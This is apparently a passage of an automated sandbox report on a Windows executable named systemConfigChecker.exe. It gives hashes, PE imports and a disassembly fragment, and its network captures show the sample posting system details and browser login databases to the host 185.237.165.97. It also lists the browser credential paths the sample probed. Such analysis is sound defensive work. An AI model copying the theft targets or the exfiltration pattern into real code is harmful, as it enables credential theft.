            ISd7zpfQxZ.elfGet hashmaliciousMiraiBrowse
            • 46.149.221.177
            o6Khx92Ipk.elfGet hashmaliciousMiraiBrowse
            • 46.149.221.156
            Bb2YTZ1paR.elfGet hashmaliciousUnknownBrowse
            • 46.149.221.161
            CLOUDFLARENETUSfile.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
            • 172.67.165.166
            5q1Wm5VlqL.exeGet hashmaliciousNetSupport RATBrowse
            • 104.26.1.231
            2LKVPFub8Z.exeGet hashmaliciousSnake KeyloggerBrowse
            • 104.21.67.152
            file.exeGet hashmaliciousLummaC StealerBrowse
            • 104.21.16.9
            7fE6IkvYWf.exeGet hashmaliciousUnknownBrowse
            • 104.16.184.241
            kYGxoN4JVW.batGet hashmaliciousUnknownBrowse
            • 172.67.74.152
            datXObAAn1.exeGet hashmaliciousDiscord RatBrowse
            • 162.159.133.234
            EeXJoO1J62.exeGet hashmaliciousDiscord RatBrowse
            • 162.159.130.234
            gcrY4QgzW9.exeGet hashmaliciousDiscord RatBrowse
            • 162.159.136.234
            DEeQxdFfyL.exeGet hashmaliciousUnknownBrowse
            • 104.21.11.231
            No context
            No context
            Process:C:\Users\user\Desktop\systemConfigChecker.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):980
            Entropy (8bit):4.86764113149876
            Encrypted:false
            SSDEEP:24:8K5Kk89E5K889EM89bYeb89EDWD89aLDpLE+89aX6nck:8KUksEU8sEMsbDbsEDWDseDdE+saX6n5
            MD5:F86566C57287E820D10672C004961521
            SHA1:046ADCDC83A99D52A289946EF51C0325D6EEDBFD
            SHA-256:8804BEE5AED4C44B0B5635E3604C4A863513B9C3BC60E09A95653EC5422B2262
            SHA-512:3DD1EC273E5CE4301AE4BB2F097340B92968F9531B9F305978129F705F6B6237C8BC14E895C5B6F407CE732F98B1BAA101EC9BA9DE7D36A58529F60AC33B18C6
            Malicious:false
            Reputation:low
            Preview:File is found: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data..File not found: C:\Users\user\AppData\Local\Google\Chrome Beta\User Data\Default\Login Data..File not found: C:\Users\user\AppData\Local\Chromium\User Data\Default\Login Data..File is found: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data..File not found: C:\Users\user\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Login Data..File not found: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data..File not found: C:\Users\user\AppData\Roaming\Opera Software\Opera GX Stable\Login Data..File not found: C:\Users\user\AppData\Local\Yandex\YandexBrowser\User Data\Default\Login Data..File not found: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\logins.json..File is found: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ov4x28i2.default\times.json..?? ??????? ???????? ????? ?? ???????...
            File type:PE32+ executable (console) x86-64, for MS Windows
            Entropy (8bit):5.9784256378182175
            TrID:
            • Win64 Executable Console (202006/5) 92.65%
            • Win64 Executable (generic) (12005/4) 5.51%
            • Generic Win/DOS Executable (2004/3) 0.92%
            • DOS Executable Generic (2002/1) 0.92%
            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
            File name:systemConfigChecker.exe
            File size:81'920 bytes
            MD5:218954f9dd70247e51af8a30940d5c33
            SHA1:35ee01d3128951c3993079186fddc9c0dbe155f7
            SHA256:95ec35703d323fe972a936d9b3574bb191e94b693656d94149897c5ff35f225f
            SHA512:335108a63a07d9d81240c40e67dc6375468bd5bae79edf413b0ec8913e43364b155fdebe0c972ab6150ae2c59779d75045108d9a257e2ce0b8c5ae78f819804e
            SSDEEP:1536:KRF3gVPu3b3X41IiaqGyB0+Hls+X7nTfRQP7K:yRE23zX41la+THls+m+
            TLSH:A2834947376A00ECD1ABA378D5A30A06D772BC05076193DF13A0A17A0FA67D1AE7FB51
            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............a...a...a.......a...b...a...e...a...d...a...`...a...`...a...`.r.a...h...a.......a...c...a.Rich..a........................
            Icon Hash:00928e8e8686b000
            Entrypoint:0x14000bae8
            Entrypoint Section:.text
            Digitally signed:false
            Imagebase:0x140000000
            Subsystem:windows cui
            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
            Time Stamp:0x6729C700 [Tue Nov 5 07:19:28 2024 UTC]
            TLS Callbacks:
            CLR (.Net) Version:
            OS Version Major:6
            OS Version Minor:0
            File Version Major:6
            File Version Minor:0
            Subsystem Version Major:6
            Subsystem Version Minor:0
            Import Hash:066fb96ba163200488bf8cbd9705163e
            Instruction
            dec eax
            sub esp, 28h
            call 00007FAF64865CF0h
            dec eax
            add esp, 28h
            jmp 00007FAF64865497h
            int3
            int3
            retn 0000h
            int3
            inc eax
            push ebx
            dec eax
            sub esp, 20h
            dec eax
            mov ebx, ecx
            xor ecx, ecx
            call dword ptr [000025CFh]
            dec eax
            mov ecx, ebx
            call dword ptr [000025BEh]
            call dword ptr [000025C8h]
            dec eax
            mov ecx, eax
            mov edx, C0000409h
            dec eax
            add esp, 20h
            pop ebx
            dec eax
            jmp dword ptr [000025BCh]
            dec eax
            mov dword ptr [esp+08h], ecx
            dec eax
            sub esp, 38h
            mov ecx, 00000017h
            call dword ptr [000025B0h]
            test eax, eax
            je 00007FAF64865629h
            mov ecx, 00000002h
            int 29h
            dec eax
            lea ecx, dword ptr [00009D26h]
            call 00007FAF648656CEh
            dec eax
            mov eax, dword ptr [esp+38h]
            dec eax
            mov dword ptr [00009E0Dh], eax
            dec eax
            lea eax, dword ptr [esp+38h]
            dec eax
            add eax, 08h
            dec eax
            mov dword ptr [00009D9Dh], eax
            dec eax
            mov eax, dword ptr [00009DF6h]
            dec eax
            mov dword ptr [00009C67h], eax
            dec eax
            mov eax, dword ptr [esp+40h]
            dec eax
            mov dword ptr [00009D6Bh], eax
            mov dword ptr [00009C41h], C0000409h
            mov dword ptr [00009C3Bh], 00000001h
            mov dword ptr [00009C45h], 00000001h
            Programming Language:
            • [IMP] VS2008 SP1 build 30729
            NameVirtual AddressVirtual Size Is in Section
            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_IMPORT0x11ed40x154.rdata
            IMAGE_DIRECTORY_ENTRY_RESOURCE0x170000x1e0.rsrc
            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x160000x9f0.pdata
            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
            IMAGE_DIRECTORY_ENTRY_BASERELOC0x180000x10c.reloc
            IMAGE_DIRECTORY_ENTRY_DEBUG0xf7b00x70.rdata
            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xf6700x140.rdata
            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_IAT0xe0000x630.rdata
            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
            .text0x10000xc0770xc200bb167b742e9c1e46cecec9663ad94a6eFalse0.48012644974226804DIY-Thermocam raw data (Lepton 3.x), scale -14592-0, spot sensor temperature -0.000048, unit celsius, color scheme 0, calibration: offset 262144.000000, slope 171778.0468756.1463104557320865IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            .rdata0xe0000x62400x6400a9c91b7191e54302f31a2135cbaafa16False0.3462109375data4.930625889732141IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .data0x150000xda00x800f49b7b400b3a9a593e0463969e69304eFalse0.19775390625DOS executable (block device driver)3.6357853761384584IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            .pdata0x160000x9f00xa005859a68e779cdab4bed9be7147961d7cFalse0.493359375data4.82362794619983IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .rsrc0x170000x1e00x2002c9bc3c453765c5a8e37ea178e81aa1bFalse0.52734375data4.710061382693063IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .reloc0x180000x10c0x2009549c1cc6ee8d55da6140afe18223169False0.42578125data3.2295190100213778IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
            NameRVASizeTypeLanguageCountryZLIB Complexity
            RT_MANIFEST0x170600x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
            DLLImport
            KERNEL32.dllGetFileAttributesW, GetLocaleInfoA, OpenProcess, GetTimeZoneInformation, GetLastError, CloseHandle, K32GetModuleBaseNameA, GetSystemInfo, K32EnumProcesses, GlobalMemoryStatusEx, GetConsoleWindow, K32EnumProcessModules, GetDiskFreeSpaceExA, FindClose, InitializeSListHead, GetSystemTimeAsFileTime, GetEnvironmentVariableW, FindNextFileW, FindFirstFileW, GetLogicalDrives, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, IsDebuggerPresent, GetModuleHandleW, QueryPerformanceCounter, GetCurrentProcessId, RtlLookupFunctionEntry, GetModuleFileNameA, GetCurrentThreadId, RtlCaptureContext
            USER32.dllShowWindow
            ADVAPI32.dllRegGetValueA, RegCloseKey, RegOpenKeyExA
            MSVCP140.dll?id@?$codecvt@_WDU_Mbstatet@@@std@@2V0locale@2@A, ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ, ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@@Z, ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z, ?sputn@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAA_JPEB_W_J@Z, ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N@Z, ?widen@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEBA_WD@Z, ?put@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@D@Z, ?put@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@_W@Z, ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ, ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEBA?AVlocale@2@XZ, ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z, ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z, ?widen@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBADD@Z, ?unshift@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEAD1AEAPEAD@Z, ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ, ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ, ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXPEAPEAD0PEAH001@Z, ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ, ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ, ??0?$basic_istream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z, ?in@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEBD1AEAPEBDPEAD3AEAPEAD@Z, ?out@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEBD1AEAPEBDPEAD3AEAPEAD@Z, ?setw@std@@YA?AU?$_Smanip@_J@1@_J@Z, ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z, ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ, ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z, ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z, ??4?$_Yarn@D@std@@QEAAAEAV01@PEBD@Z, ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA@XZ, ?_Lock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAAXXZ, ?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAAXXZ, ?showmanyc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAA_JXZ, ?uflow@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAAHXZ, ?xsgetn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAA_JPEAD_J@Z, ?xsputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAA_JPEBD_J@Z, ?setbuf@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAAPEAV12@PEAD_J@Z, ?sync@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAAHXZ, ?imbue@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAAXAEBVlocale@2@@Z, ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ, ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA@XZ, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAVios_base@1@AEAV21@@Z@Z, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@G@Z, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K@Z, ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z, ??1?$basic_istream@DU?$char_traits@D@std@@@std@@UEAA@XZ, ?read@?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@PEAD_J@Z, ?seekg@?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@_JH@Z, ?tellg@?$basic_istream@DU?$char_traits@D@std@@@std@@QEAA?AV?$fpos@U_Mbstatet@@@2@XZ, ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ, ?good@ios_base@std@@QEBA_NXZ, ??7ios_base@std@@QEBA_NXZ, ??1?$codecvt@_WDU_Mbstatet@@@std@@MEAA@XZ, ??0?$codecvt@_WDU_Mbstatet@@@std@@QEAA@_K@Z, ?out@?$codecvt@_WDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEB_W1AEAPEB_WPEAD3AEAPEAD@Z, ?in@?$codecvt@_WDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEBD1AEAPEBDPEA_W3AEAPEA_W@Z, ?always_noconv@codecvt_base@std@@QEBA_NXZ, ?_Addfac@_Locimp@locale@std@@AEAAXPEAVfacet@23@_K@Z, ?_Decref@facet@locale@std@@UEAAPEAV_Facet_base@3@XZ, ?_Incref@facet@locale@std@@UEAAXXZ, ??Bid@locale@std@@QEAA_KXZ, ?_Fiopen@std@@YAPEAU_iobuf@@PEB_WHH@Z, ?id@?$codecvt@DDU_Mbstatet@@@std@@2V0locale@2@A, ?cerr@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A, ?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A, ?uncaught_exception@std@@YA_NXZ, ?_Init@locale@std@@CAPEAV_Locimp@12@_N@Z, ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12@XZ, ?_New_Locimp@_Locimp@locale@std@@CAPEAV123@AEBV123@@Z, ?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A, ??0_Lockit@std@@QEAA@H@Z, ??1_Lockit@std@@QEAA@XZ, ?_Xlength_error@std@@YAXPEBD@Z
            IPHLPAPI.DLLGetAdaptersInfo
            NETAPI32.dllNetApiBufferFree, NetUserEnum, NetGetJoinInformation
            WINHTTP.dllWinHttpQueryDataAvailable, WinHttpConnect, WinHttpSendRequest, WinHttpCloseHandle, WinHttpOpenRequest, WinHttpReadData, WinHttpQueryHeaders, WinHttpOpen, WinHttpReceiveResponse
            VCRUNTIME140_1.dll__CxxFrameHandler4
            VCRUNTIME140.dll__C_specific_handler, _CxxThrowException, memset, __current_exception, __std_terminate, __std_exception_copy, memcpy, memcmp, memchr, memmove, __current_exception_context, __std_exception_destroy
            api-ms-win-crt-stdio-l1-1-0.dllfread, fsetpos, ungetc, _fseeki64, _get_stream_buffer_pointers, setvbuf, fgetpos, fwrite, fflush, __p__commode, fputc, fgetc, fclose, _set_fmode
            api-ms-win-crt-heap-l1-1-0.dllfree, malloc, _set_new_mode, _callnewh
            api-ms-win-crt-string-l1-1-0.dllisalnum
            api-ms-win-crt-filesystem-l1-1-0.dll_lock_file, _unlock_file
            api-ms-win-crt-runtime-l1-1-0.dll_get_initial_narrow_environment, _initterm, _initterm_e, _cexit, _exit, __p___argc, __p___argv, _c_exit, _register_thread_local_exe_atexit_callback, _crt_atexit, _register_onexit_function, _seh_filter_exe, _initialize_onexit_table, _initialize_narrow_environment, _configure_narrow_argv, _set_app_type, exit, terminate, _invalid_parameter_noinfo_noreturn
            api-ms-win-crt-math-l1-1-0.dll__setusermatherr
            api-ms-win-crt-locale-l1-1-0.dll_configthreadlocale
            Language of compilation systemCountry where language is spokenMap
            EnglishUnited States
            TimestampSource PortDest PortSource IPDest IP
            Dec 6, 2024 10:56:05.611848116 CET4971180192.168.2.12172.67.74.152
            Dec 6, 2024 10:56:05.731646061 CET8049711172.67.74.152192.168.2.12
            Dec 6, 2024 10:56:05.731770039 CET4971180192.168.2.12172.67.74.152
            Dec 6, 2024 10:56:05.731997013 CET4971180192.168.2.12172.67.74.152
            Dec 6, 2024 10:56:05.851737976 CET8049711172.67.74.152192.168.2.12
            Dec 6, 2024 10:56:06.837409973 CET8049711172.67.74.152192.168.2.12
            Dec 6, 2024 10:56:06.887846947 CET4971180192.168.2.12172.67.74.152
            Dec 6, 2024 10:56:07.314337969 CET4971280192.168.2.12185.237.165.97
            Dec 6, 2024 10:56:07.434431076 CET8049712185.237.165.97192.168.2.12
            Dec 6, 2024 10:56:07.434529066 CET4971280192.168.2.12185.237.165.97
            Dec 6, 2024 10:56:07.435007095 CET4971280192.168.2.12185.237.165.97
            Dec 6, 2024 10:56:07.435007095 CET4971280192.168.2.12185.237.165.97
            Dec 6, 2024 10:56:07.555124998 CET8049712185.237.165.97192.168.2.12
            Dec 6, 2024 10:56:07.555138111 CET8049712185.237.165.97192.168.2.12
            Dec 6, 2024 10:56:07.555203915 CET4971280192.168.2.12185.237.165.97
            Dec 6, 2024 10:56:07.555222034 CET8049712185.237.165.97192.168.2.12
            Dec 6, 2024 10:56:07.555258989 CET8049712185.237.165.97192.168.2.12
            Dec 6, 2024 10:56:07.555263996 CET4971280192.168.2.12185.237.165.97
            Dec 6, 2024 10:56:07.555603027 CET8049712185.237.165.97192.168.2.12
            Dec 6, 2024 10:56:07.555613995 CET8049712185.237.165.97192.168.2.12
            Dec 6, 2024 10:56:07.555624962 CET8049712185.237.165.97192.168.2.12
            Dec 6, 2024 10:56:07.555640936 CET8049712185.237.165.97192.168.2.12
            Dec 6, 2024 10:56:07.555648088 CET4971280192.168.2.12185.237.165.97
            Dec 6, 2024 10:56:07.555649996 CET8049712185.237.165.97192.168.2.12
            Dec 6, 2024 10:56:07.555661917 CET4971280192.168.2.12185.237.165.97
            Dec 6, 2024 10:56:07.555663109 CET8049712185.237.165.97192.168.2.12
            Dec 6, 2024 10:56:07.555686951 CET4971280192.168.2.12185.237.165.97
            Dec 6, 2024 10:56:07.555716991 CET4971280192.168.2.12185.237.165.97
            Dec 6, 2024 10:56:07.675282955 CET8049712185.237.165.97192.168.2.12
            Dec 6, 2024 10:56:07.675323963 CET8049712185.237.165.97192.168.2.12
            Dec 6, 2024 10:56:07.675338984 CET4971280192.168.2.12185.237.165.97
            Dec 6, 2024 10:56:07.675375938 CET4971280192.168.2.12185.237.165.97
            Dec 6, 2024 10:56:07.675386906 CET8049712185.237.165.97192.168.2.12
            Dec 6, 2024 10:56:07.675396919 CET8049712185.237.165.97192.168.2.12
            Dec 6, 2024 10:56:07.675451040 CET8049712185.237.165.97192.168.2.12
            Dec 6, 2024 10:56:07.675452948 CET4971280192.168.2.12185.237.165.97
            Dec 6, 2024 10:56:07.675462008 CET8049712185.237.165.97192.168.2.12
            Dec 6, 2024 10:56:07.675494909 CET4971280192.168.2.12185.237.165.97
            Dec 6, 2024 10:56:07.675520897 CET4971280192.168.2.12185.237.165.97
            Dec 6, 2024 10:56:07.720442057 CET8049712185.237.165.97192.168.2.12
            Dec 6, 2024 10:56:07.720540047 CET4971280192.168.2.12185.237.165.97
            Dec 6, 2024 10:56:07.836457014 CET8049712185.237.165.97192.168.2.12
            Dec 6, 2024 10:56:07.836555958 CET4971280192.168.2.12185.237.165.97
            Dec 6, 2024 10:56:07.888536930 CET8049712185.237.165.97192.168.2.12
            Dec 6, 2024 10:56:07.888616085 CET4971280192.168.2.12185.237.165.97
            Dec 6, 2024 10:56:08.004518986 CET8049712185.237.165.97192.168.2.12
            Dec 6, 2024 10:56:08.004589081 CET4971280192.168.2.12185.237.165.97
            Dec 6, 2024 10:56:08.161367893 CET8049712185.237.165.97192.168.2.12
            Dec 6, 2024 10:56:08.161470890 CET4971280192.168.2.12185.237.165.97
            Dec 6, 2024 10:56:08.281646967 CET8049712185.237.165.97192.168.2.12
            Dec 6, 2024 10:56:08.408458948 CET8049712185.237.165.97192.168.2.12
            Dec 6, 2024 10:56:08.412523031 CET4971280192.168.2.12185.237.165.97
            Dec 6, 2024 10:56:08.664560080 CET8049712185.237.165.97192.168.2.12
            Dec 6, 2024 10:56:08.668513060 CET4971280192.168.2.12185.237.165.97
            Dec 6, 2024 10:56:08.913089037 CET8049712185.237.165.97192.168.2.12
            Dec 6, 2024 10:56:08.913269997 CET4971280192.168.2.12185.237.165.97
            Dec 6, 2024 10:56:09.160538912 CET8049712185.237.165.97192.168.2.12
            Dec 6, 2024 10:56:09.160598993 CET4971280192.168.2.12185.237.165.97
            Dec 6, 2024 10:56:09.408449888 CET8049712185.237.165.97192.168.2.12
            Dec 6, 2024 10:56:09.408643007 CET4971280192.168.2.12185.237.165.97
            Dec 6, 2024 10:56:09.569574118 CET8049712185.237.165.97192.168.2.12
            Dec 6, 2024 10:56:10.027070999 CET4971180192.168.2.12172.67.74.152
            TimestampSource PortDest PortSource IPDest IP
            Dec 6, 2024 10:56:05.421950102 CET6351053192.168.2.121.1.1.1
            Dec 6, 2024 10:56:05.560806990 CET53635101.1.1.1192.168.2.12
            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
            Dec 6, 2024 10:56:05.421950102 CET192.168.2.121.1.1.10x4173Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
            Dec 6, 2024 10:56:05.560806990 CET1.1.1.1192.168.2.120x4173No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
            Dec 6, 2024 10:56:05.560806990 CET1.1.1.1192.168.2.120x4173No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
            Dec 6, 2024 10:56:05.560806990 CET1.1.1.1192.168.2.120x4173No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
            • api.ipify.org
            • 185.237.165.97
            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            0192.168.2.1249711172.67.74.152807160C:\Users\user\Desktop\systemConfigChecker.exe
            TimestampBytes transferredDirectionData
            Dec 6, 2024 10:56:05.731997013 CET88OUTGET / HTTP/1.1
            Connection: Keep-Alive
            User-Agent: WinHTTP/1.0
            Host: api.ipify.org
            Dec 6, 2024 10:56:06.837409973 CET429INHTTP/1.1 200 OK
            Date: Fri, 06 Dec 2024 09:56:06 GMT
            Content-Type: text/plain
            Content-Length: 12
            Connection: keep-alive
            Vary: Origin
            CF-Cache-Status: DYNAMIC
            Server: cloudflare
            CF-RAY: 8edb6775897443ab-EWR
            server-timing: cfL4;desc="?proto=TCP&rtt=1748&min_rtt=1748&rtt_var=874&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=88&delivery_rate=0&cwnd=219&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
            Data Raw: 38 2e 34 36 2e 31 32 33 2e 32 32 38
            Data Ascii: 8.46.123.228


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            1192.168.2.1249712185.237.165.97807160C:\Users\user\Desktop\systemConfigChecker.exe
            TimestampBytes transferredDirectionData
            Dec 6, 2024 10:56:07.435007095 CET185OUTPOST /userdata HTTP/1.1
            Connection: Keep-Alive
            Content-Type: multipart/form-data; boundary=WebKitFormBoundary
            User-Agent: WinHTTP/1.0
            Content-Length: 96458
            Host: 185.237.165.97
            Dec 6, 2024 10:56:07.435007095 CET11124OUTData Raw: 2d 2d 57 65 62 4b 69 74 46 6f 72 6d 42 6f 75 6e 64 61 72 79 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 73 79 73 69 6e 66 6f 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65
            Data Ascii: --WebKitFormBoundaryContent-Disposition: form-data; name="sysinfo"Content-Type: application/json{ "sysinfo": "MACHINE%20INFO%3a%0aMachine%20name%3a%20440BX%20Desktop%20Reference%20Platform%0aProcessor%20name%3a%20Intel%28R%29%20Core%28
            Dec 6, 2024 10:56:07.555203915 CET3708OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            Data Ascii:
            Dec 6, 2024 10:56:07.555263996 CET2472OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            Data Ascii:
            Dec 6, 2024 10:56:07.555648088 CET4944OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            Data Ascii:
            Dec 6, 2024 10:56:07.555661917 CET4944OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            Data Ascii:
            Dec 6, 2024 10:56:07.555686951 CET4944OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            Data Ascii: 3AtableloginsloginsCREATE TABLE logins (origin_url V
            Dec 6, 2024 10:56:07.555716991 CET2472OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            Data Ascii:
            Dec 6, 2024 10:56:07.675338984 CET2472OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0a 00 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            Data Ascii:
